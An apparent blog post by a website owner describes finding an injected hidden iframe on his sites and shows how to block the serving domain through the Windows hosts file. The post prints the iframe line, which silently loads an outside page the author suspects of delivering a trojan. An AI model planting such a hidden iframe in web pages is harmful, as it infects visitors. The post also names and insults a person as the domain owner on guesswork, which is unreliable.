Recently I noticed something else than google analytics loading in the status bar when I visited some of my sites, so I thought I`ll have a closer look.
Of course, I removed the links without thinking, but I did save thescript.
Here is how the script looks:
Here is what the script does:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Here is the iframe content:
Probably a trojan of some knind, didn`t feel like looking any further.
Interesting thing is how that code got on my websites. I`m sure my account was not hacked, if it was so, all my sites would have been messed with, so I`m guessing it was the server that got hacked. What people would do for a few extra links and traffic.
As for the surfers, I guess you should block that site so you won`t get infected with who knows what.
Easyest way to do that is to edit your hosts file.
Where to find hosts file:
Windows Vista = C:\WINDOWS\SYSTEM32\DRIVERS\ETC Windows XP = C:\WINDOWS\SYSTEM32\DRIVERS\ETC Windows 2K = C:\WINNT\SYSTEM32\DRIVERS\ETC Win 98/ME = C:\WINDOWS
How hosts file contents look like:
Edit and add the unvanted site:
How it should look now:
127.0.0.1 localhost 127.0.0.1 tumultuosum.com
So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he`s just a big fat jerk and a lousy hacker.